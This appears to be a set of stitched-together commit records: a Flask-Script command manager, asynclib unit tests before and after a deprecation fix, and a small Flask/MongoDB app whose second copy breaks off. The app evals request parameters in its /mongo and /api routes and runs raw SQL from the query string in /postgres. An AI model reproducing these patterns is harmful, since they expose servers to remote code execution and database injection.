default = choices[0]
while True:
rv = prompt(name + '? - (%s)' % ', '.join(choices), default)
rv = rv.lower()
if not rv:
return default
if rv in choices:
if rv == 'none':
return None
else:
return rv
class Option(object):
"""
Stores positional and optional arguments for `ArgumentParser.add_argument
<http://argparse.googlecode.com/svn/trunk/doc/add_argument.html>`_.
:param name_or_flags: Either a name or a list of option strings,
e.g. foo or -f, --foo
:param action: The basic type of action to be taken when this argument
is encountered at the command-line.
:param nargs: The number of command-line arguments that should be consumed.
:param const: A constant value required by some action and nargs selections.
:param default: The value produced if the argument is absent from
the command-line.
:param type: The type to which the command-line arg should be converted.
:param choices: A container of the allowable values for the argument.
:param required: Whether or not the command-line option may be omitted
(optionals only).
:param help: A brief description of what the argument does.
:param metavar: A name for the argument in usage messages.
:param dest: The name of the attribute to be added to the object
returned by parse_args().
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class Command(object):
"""
Base class for creating commands.
"""
option_list = []
@property
def description(self):
description = self.__doc__ or ''
return description.strip()
def add_option(self, option):
"""
Adds Option to option list.
"""
self.option_list.append(option)
def get_options(self):
"""
By default, returns self.option_list.Override if you
need to do instance-specific configuration.
"""
return self.option_list
def create_parser(self, prog):
parser = argparse.ArgumentParser(prog=prog,
description=self.description)
for option in self.get_options():
parser.add_argument(*option.args, **option.kwargs)
return parser
def run(self, app):
"""
Runs a command. This must be implemented by the subclass. The first
argument is always the app (Flask instance) followed by arguments
as configured by the Command options.
"""
raise NotImplementedError
def prompt(self, name, default=None):
warnings.warn_explicit(
"Command.prompt is deprecated, use prompt() function instead")
prompt(name, default)
def prompt_pass(self, name, default=None):
warnings.warn_explicit(
"Command.prompt_pass is deprecated, use prompt_pass() function instead")
prompt_pass(name, default)
def prompt_bool(self, name, default=False):
warnings.warn_explicit(
"Command.prompt_bool is deprecated, use prompt_bool() function instead")
prompt_bool(name, default)
def prompt_choices(self, name, choices, default=None):
warnings.warn_explicit(
"Command.choices is deprecated, use prompt_choices() function instead")
prompt_choices(name, choices, default)
class Shell(Command):
"""
Runs a Python shell inside Flask application context.
:param banner: banner appearing at top of shell when started
:param make_context: a callable returning a dict of variables
used in the shell namespace. The callable
takes a single argument, "app", the Flask
instance. By default returns a dict consisting
of just the app.
:param use_ipython: use IPython shell if available, ignore if not.
The IPython shell can be turned off in command
line by passing the **--no-ipython** flag.
"""
banner = ''
description = 'Runs a Python shell inside Flask application context.'
def __init__(self, banner=None, make_context=None, use_ipython=True):
self.banner = banner or self.banner
self.use_ipython = use_ipython
if make_context is None:
make_context = lambda app: dict(app=app)
self.make_context = make_context
def get_options(self):
return (
Option('--no-ipython',
action="store_true",
dest='no_ipython',
default=not(self.use_ipython)),)
def get_context(self, app):
"""
Returns a dict of context variables added to the shell namespace.
"""
return self.make_context(app)
def run(self, app, no_ipython):
"""
Runs the shell. Unless no_ipython is True or use_python is False
then runs IPython shell if that is installed.
"""
context = self.get_context(app)
if not no_ipython:
try:
import IPython
sh = IPython.Shell.IPShellEmbed(banner=self.banner)
sh(global_ns=dict(), local_ns=context)
return
except ImportError:
pass
code.interact(self.banner, local=context)
class Server(Command):
"""
Runs the Flask development server i.e. app.run()
:param host: server host
:param port: server port
:param use_debugger: if False, will no longer use Werkzeug debugger.
This can be overriden in the command line
by passing the **-d** flag.
:param use_reloader: if False, will no longer use auto-reloader.
This can be overriden in the command line by
passing the **-r** flag.
"""
description = 'Runs the Flask development server i.e. app.run()'
def __init__(self, host='127.0.0.1', port=5000, use_debugger=True,
use_reloader=True):
self.port = port
self.host = host
self.use_debugger = use_debugger
self.use_reloader = use_reloader
def get_options(self):
return (
Option('-t', '--host',
dest='host',
default=self.host),
Option('-p', '--port',
dest='port',
type=int,
default=self.port),
Option('-d', '--debug',
action='store_true',
dest='use_debugger',
default=self.use_debugger),
Option('-r', '--reload',
action='store_true',
dest='use_reloader',
default=self.use_reloader))
def run(self, app, host, port, use_debugger, use_reloader):
app.run(host=host,
port=port,
debug=use_debugger,
use_debugger=use_debugger,
use_reloader=use_reloader)
class InvalidCommand(Exception):
pass
class Manager(object):
"""
Controller class for handling a set of commands.
Typical usage::
class Print(Command):
def run(self, app):
print "hello"
app = Flask(__name__)
manager = Manager(app)
manager.add_command("print", Print())
if __name__ == "__main__":
manager.run()
On command line::
python manage.py print
> hello
:param app: Flask instance or callable returning a Flask instance.
:param with_default_commands: load commands **runserver** and **shell**
by default.
"""
def __init__(self, app, with_default_commands=True):
self.app = app
self._commands = dict()
self._options = list()
if with_default_commands:
self.add_default_commands()
def add_default_commands(self):
"""
Adds the shell and runserver default commands. To override these
simply add your own equivalents using add_command or decorators.
"""
self.add_command("shell", Shell())
self.add_command("runserver", Server())
def create_app(self, **kwargs):
if isinstance(self.app, Flask):
return self.app
return self.app(**kwargs)
def create_parser(self, prog):
"""
Creates an ArgumentParser instance from options returned
by get_options(), and a subparser for the given command.
"""
parser = argparse.ArgumentParser(prog=prog)
for option in self.get_options():
parser.add_argument(*option.args, **option.kwargs)
return parser
def get_options(self):
return self._options
def add_option(self, *args, **kwargs):
"""
Adds an application-wide option. This is useful if you want to set variables
applying to the application setup, rather than individual commands.
For this to work, the manager must be initialized with a factory
function rather than an instance. Otherwise any options you set will
be ignored.
The arguments are then passed to your function, e.g.::
def create_app(config=None):
app = Flask(__name__)
if config:
app.config.from_pyfile(config)
return app
manager = Manager(create_app)
manager.add_option("-c", "--config", dest="config", required=False)
> python manage.py -c dev.cfg mycommand
Any manager options passed in the command line will not be passed to
the command.
Arguments for this function are the same as for the Option class.
"""
self._options.append(Option(*args, **kwargs))
def command(self, func):
"""
Adds a command function to the registry.
:param func: command function. Should take at least one argument, the
Flask application. Additional arguments depend on the
options.
"""
args, varargs, keywords, defaults = inspect.getargspec(func)
options = []
# first arg is always "app" : ignore
args = args[1:]
defaults = defaults or []
kwargs = dict(zip(*[reversed(l) for l in (args, defaults)]))
for arg in args:
if arg in kwargs:
default=kwargs[arg]
if isinstance(default, bool):
options.append(Option('-%s' % arg[0],
'--%s' % arg,
action="store_true",
dest=arg,
required=False,
default=default))
else:
options.append(Option('-%s' % arg[0],
'--%s' % arg,
dest=arg,
required=False,
default=default))
else:
options.append(Option(arg))
command = Command()
command.run = func
command.__doc__ = func.__doc__
command.option_list = options
self.add_command(func.__name__, command)
return func
def shell(self, func):
"""
Decorator that wraps function in shell command. This is equivalent to::
def _make_context(app):
return dict(app=app)
manager.add_command("shell", Shell(make_context=_make_context))
The decorated function should take a single "app" argument, and return
a dict.
For more sophisticated usage use the Shell class.
"""
self.add_command('shell', Shell(make_context=func))
return func
def option(self, *args, **kwargs):
"""
Decorator to add an option to a function. Automatically registers the
function - do not use together with ``@command``. You can add as many
``@option`` calls as you like, for example::
@option('-n', '--name', dest='name')
@option('-u', '--url', dest='url')
def hello(app, name, url):
print "hello", name, url
Takes the same arguments as the ``Option`` constructor.
"""
option = Option(*args, **kwargs)
def decorate(func):
name = func.__name__
if name not in self._commands:
command = Command()
command.run = func
command.__doc__ = func.__doc__
command.option_list = []
self.add_command(name, command)
self._commands[name].option_list.append(option)
return func
return decorate
def add_command(self, name, command):
"""
Adds command to registry.
:param command: Command instance
"""
self._commands[name] = command
def get_usage(self):
"""
Returns string consisting of all commands and their
descriptions.
"""
rv = []
for name, command in self._commands.iteritems():
usage = name
description = command.description
if description:
usage += ": " + description
rv.append(usage)
return "\n".join(rv)
def print_usage(self):
"""
Prints result of get_usage()
"""
print self.get_usage()
def handle(self, prog, name, args=None):
args = list(args or [])
try:
command = self._commands[name]
except KeyError:
raise InvalidCommand, "Command %s not found" % name
help_args = ('-h', '--help')
# remove -h from args if present, and add to remaining args
app_args = [a for a in args if a not in help_args]
app_parser = self.create_parser(prog)
app_namespace, remaining_args = app_parser.parse_known_args(app_args)
for arg in help_args:
if arg in args:
remaining_args.append(arg)
command_parser = command.create_parser(prog + " " + name)
command_namespace = command_parser.parse_args(remaining_args)
app = self.create_app(**app_namespace.__dict__)
with app.test_request_context():
command.run(app, **command_namespace.__dict__)
def run(self, commands=None):
"""
Prepares manager to receive command line input. Usually run
inside "if __name__ == "__main__" block in a Python script.
:param commands: optional dict of commands. Appended to any commands
added using add_command().
"""
if commands:
self._commands.update(commands)
try:
self.handle(sys.argv[0],
sys.argv[1],
sys.argv[2:])
sys.exit(0)
except IndexError:
self.print_usage()
sys.exit(0)
except InvalidCommand, e:
print e
self.print_usage()
sys.exit(1)
|
from astm import asynclib
import unittest
import select
import os
import socket
import threading
import time
import errno
try:
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
def skip(f):
return f
except ImportError:
from test import support as test_support
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO as StringIO
from io import FileIO as file
from unittest import skip
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asynclib.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_exception_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_exception_event = handle_read_event
def handle_error(self):
self.error_handled = True
class dispatcherwithsend_noread(asynclib.Dispatcher):
def __init__(self, sock=None, map=None):
super(dispatcherwithsend_noread, self).__init__(sock, map)
self.out_buffer = ''
def initiate_send(self):
num_sent = super(dispatcherwithsend_noread, self).send(self.out_buffer[:512])
self.out_buffer = self.out_buffer[num_sent:]
def handle_write(self):
self.initiate_send()
def writable(self):
return (not self.connected) or len(self.out_buffer)
def send(self, data):
self.out_buffer += data.decode()
self.initiate_send()
def readable(self):
return False
def handle_connect(self):
pass
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asynclib read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asynclib.ExitNow, asynclib.read, tr1)
self.assertRaises(asynclib.ExitNow, asynclib.write, tr1)
self.assertRaises(asynclib.ExitNow, asynclib.exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asynclib.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asynclib.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asynclib.exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asynclib.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_exception_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asynclib.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asynclib readwrite call
tr1 = exitingdummy()
self.assertRaises(asynclib.ExitNow, asynclib.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asynclib.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asynclib._SOCKET_MAP
try:
asynclib._SOCKET_MAP = testmap
asynclib.close_all()
finally:
testmap, asynclib._SOCKET_MAP = asynclib._SOCKET_MAP, socketmap
else:
asynclib.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asynclib.close_all()
def test_basic(self):
d = asynclib.Dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asynclib.Dispatcher()
self.assertTrue(repr(d).endswith('Dispatcher at %#x>' % id(d)))
def test_strerror(self):
# refers to bug #8573
err = asynclib._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asynclib._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asynclib.close_all()
@skip
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?".encode()
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asynclib.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
class CallLaterTests(unittest.TestCase):
"""Tests for CallLater class."""
def setUp(self):
# remove any unfired scheduled call left behind
asynclib.close_all()
def scheduler(self, timeout=0.01, count=100):
while asynclib._SCHEDULED_TASKS and count > 0:
asynclib.scheduler()
count -= 1
time.sleep(timeout)
def test_interface(self):
fun = lambda: 0
self.assertRaises(AssertionError, asynclib.call_later, -1, fun)
x = asynclib.call_later(3, fun)
self.assertRaises(AssertionError, x.delay, -1)
self.assert_(x.cancelled is False)
x.cancel()
self.assert_(x.cancelled is True)
self.assertRaises(AssertionError, x.call)
self.assertRaises(AssertionError, x.reset)
self.assertRaises(AssertionError, x.delay, 2)
self.assertRaises(AssertionError, x.cancel)
def test_order(self):
l = []
fun = lambda x: l.append(x)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
asynclib.call_later(x, fun, x)
self.scheduler()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
def test_delay(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01).delay(0.07)
asynclib.call_later(0.02, fun, 0.02).delay(0.08)
asynclib.call_later(0.03, fun, 0.03)
asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05)
asynclib.call_later(0.06, fun, 0.06).delay(0.001)
self.scheduler()
self.assertEqual(l, [0.06, 0.03, 0.04, 0.05, 0.01, 0.02])
def test_reset(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01)
asynclib.call_later(0.02, fun, 0.02)
asynclib.call_later(0.03, fun, 0.03)
x = asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05)
time.sleep(0.1)
x.reset()
self.scheduler()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.05, 0.04])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01).cancel()
asynclib.call_later(0.02, fun, 0.02)
asynclib.call_later(0.03, fun, 0.03)
asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05).cancel()
self.scheduler()
self.assertEqual(l, [0.02, 0.03, 0.04])
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
CallLaterTests, DispatcherWithSendTests_UsePoll]
run_unittest(*tests)
if __name__ == "__main__":
test_main()
Fix deprecation warnings.
from astm import asynclib
import unittest
import select
import os
import socket
import threading
import time
import errno
try:
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
def skip(f):
return f
except ImportError:
from test import support as test_support
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO as StringIO
from io import FileIO as file
from unittest import skip
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asynclib.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_exception_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_exception_event = handle_read_event
def handle_error(self):
self.error_handled = True
class dispatcherwithsend_noread(asynclib.Dispatcher):
def __init__(self, sock=None, map=None):
super(dispatcherwithsend_noread, self).__init__(sock, map)
self.out_buffer = ''
def initiate_send(self):
num_sent = super(dispatcherwithsend_noread, self).send(self.out_buffer[:512])
self.out_buffer = self.out_buffer[num_sent:]
def handle_write(self):
self.initiate_send()
def writable(self):
return (not self.connected) or len(self.out_buffer)
def send(self, data):
self.out_buffer += data.decode()
self.initiate_send()
def readable(self):
return False
def handle_connect(self):
pass
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asynclib read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asynclib.ExitNow, asynclib.read, tr1)
self.assertRaises(asynclib.ExitNow, asynclib.write, tr1)
self.assertRaises(asynclib.ExitNow, asynclib.exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asynclib.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asynclib.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asynclib.exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asynclib.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_exception_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asynclib.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asynclib readwrite call
tr1 = exitingdummy()
self.assertRaises(asynclib.ExitNow, asynclib.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asynclib.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asynclib._SOCKET_MAP
try:
asynclib._SOCKET_MAP = testmap
asynclib.close_all()
finally:
testmap, asynclib._SOCKET_MAP = asynclib._SOCKET_MAP, socketmap
else:
asynclib.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asynclib.close_all()
def test_basic(self):
d = asynclib.Dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asynclib.Dispatcher()
self.assertTrue(repr(d).endswith('Dispatcher at %#x>' % id(d)))
def test_strerror(self):
# refers to bug #8573
err = asynclib._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asynclib._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asynclib.close_all()
@skip
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?".encode()
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asynclib.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
class CallLaterTests(unittest.TestCase):
"""Tests for CallLater class."""
def setUp(self):
# remove any unfired scheduled call left behind
asynclib.close_all()
def scheduler(self, timeout=0.01, count=100):
while asynclib._SCHEDULED_TASKS and count > 0:
asynclib.scheduler()
count -= 1
time.sleep(timeout)
def test_interface(self):
fun = lambda: 0
self.assertRaises(AssertionError, asynclib.call_later, -1, fun)
x = asynclib.call_later(3, fun)
self.assertRaises(AssertionError, x.delay, -1)
self.assertTrue(x.cancelled is False)
x.cancel()
self.assertTrue(x.cancelled is True)
self.assertRaises(AssertionError, x.call)
self.assertRaises(AssertionError, x.reset)
self.assertRaises(AssertionError, x.delay, 2)
self.assertRaises(AssertionError, x.cancel)
def test_order(self):
l = []
fun = lambda x: l.append(x)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
asynclib.call_later(x, fun, x)
self.scheduler()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
def test_delay(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01).delay(0.07)
asynclib.call_later(0.02, fun, 0.02).delay(0.08)
asynclib.call_later(0.03, fun, 0.03)
asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05)
asynclib.call_later(0.06, fun, 0.06).delay(0.001)
self.scheduler()
self.assertEqual(l, [0.06, 0.03, 0.04, 0.05, 0.01, 0.02])
def test_reset(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01)
asynclib.call_later(0.02, fun, 0.02)
asynclib.call_later(0.03, fun, 0.03)
x = asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05)
time.sleep(0.1)
x.reset()
self.scheduler()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.05, 0.04])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
asynclib.call_later(0.01, fun, 0.01).cancel()
asynclib.call_later(0.02, fun, 0.02)
asynclib.call_later(0.03, fun, 0.03)
asynclib.call_later(0.04, fun, 0.04)
asynclib.call_later(0.05, fun, 0.05).cancel()
self.scheduler()
self.assertEqual(l, [0.02, 0.03, 0.04])
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
CallLaterTests, DispatcherWithSendTests_UsePoll]
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
#!/usr/bin/python3
# -*- coding: latin-1 -*-
import os
import sys
# import psycopg2
import json
from bson import json_util
from pymongo import MongoClient, DESCENDING
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, current_app, make_response, jsonify
from flask_cors import CORS, cross_origin
from datetime import timedelta
from functools import update_wrapper
def create_app():
app = Flask(__name__)
return app
app = create_app()
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "genuino"
MONGOSERVER = "localhost"
MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
db2 = client.genuino
escuchas = db2.escuchas
''' # Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
POSTGRESDATABASE = "mydatabase"
POSTGRESUSER = "myuser"
POSTGRESPASS = "mypass"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=POSTGRESPASS)
'''
# Cambiar por Path Absoluto en el servidor
QUERIES_FILENAME = '/var/www/flaskr/queries'
@app.route("/")
def home():
with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"]) for x in json_file]
return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
query = request.args.get("query")
results = eval('mongodb.' + query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('mongo.html', results=results)
else:
return "ok"
@app.route("/api/<consulta>/<datos1>")
@cross_origin(origin='*')
def api(consulta, datos1):
if consulta == '1':
fecha = datos1
query = "escuchas.find({'fecha': '" + fecha + "'}, {'numero': 1})"
resultado = eval('mongodb.' + query)
return json_util.dumps(resultado, sort_keys=True, indent=4)
elif consulta == '2':
separados = datos1.split('_')
numero = separados[0]
limite = separados[1]
consultilla = escuchas.find({'numero': numero}).sort([{'fecha': DESCENDING}])
return json_util.dumps(consultilla, sort_keys=True, indent=4)
elif consulta == '3':
clave = datos1
fecha = clave
else:
return 'Not Implemented'
coso = jsonify({'date': fecha})
return coso
@app.route("/postgres")
def postgres():
query = request.args.get("query")
cursor = postgresdb.cursor()
cursor.execute(query)
results = [[a for a in result] for result in cursor]
print(results)
return render_template('postgres.html', results=results)
@app.route("/example")
def example():
return render_template('example.html')
if __name__ == "__main__":
app.run()
mongotest1.28
#!/usr/bin/python3
# -*- coding: latin-1 -*-
import os
import sys
# import psycopg2
import json
from bson import json_util
from pymongo import MongoClient, DESCENDING
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, current_app, make_response, jsonify
from flask_cors import CORS, cross_origin
from datetime import timedelta
from functools import update_wrapper
def create_app():
app = Flask(__name__)
return app
app = create_app()
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "genuino"
MONGOSERVER = "localhost"
MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
db2 = client.genuino
escuchas = db2.escuchas
''' # Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
POSTGRESDATABASE = "mydatabase"
POSTGRESUSER = "myuser"
POSTGRESPASS = "mypass"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=POSTGRESPASS)
'''
# Cambiar por Path Absoluto en el servidor
QUERIES_FILENAME = '/var/www/flaskr/queries'
@app.route("/")
def home():
with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
json_file = json.load(queries_file)
pairs = [(x["name"],
x["database"],
x["description"],
x["query"]) for x in json_file]
return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
query = request.args.get("query")
results = eval('mongodb.' + query)
results = json_util.dumps(results, sort_keys=True, indent=4)
if "find" in query:
return render_template('mongo.html', results=results)
else:
return "ok"
@app.route("/api/<consulta>/<datos1>")
@cross_origin(origin='*')
def api(consulta, datos1):
if consulta == '1':
fecha = datos1
query = "escuchas.find({'fecha': '" + fecha + "'}, {'numero': 1})"
resultado = eval('mongodb.' + query)
return json_util.dumps(resultado, sort_keys=True, indent=4)
elif consulta == '2':
separados = datos1.split('_')
numero = separados[0]
consultilla = escuchas.find({'numero': numero}).sort([{'fecha': DESCENDING}])
return json_util.dumps(consultilla, sort_keys=True, indent=4)
elif consulta == '3':
clave = datos1
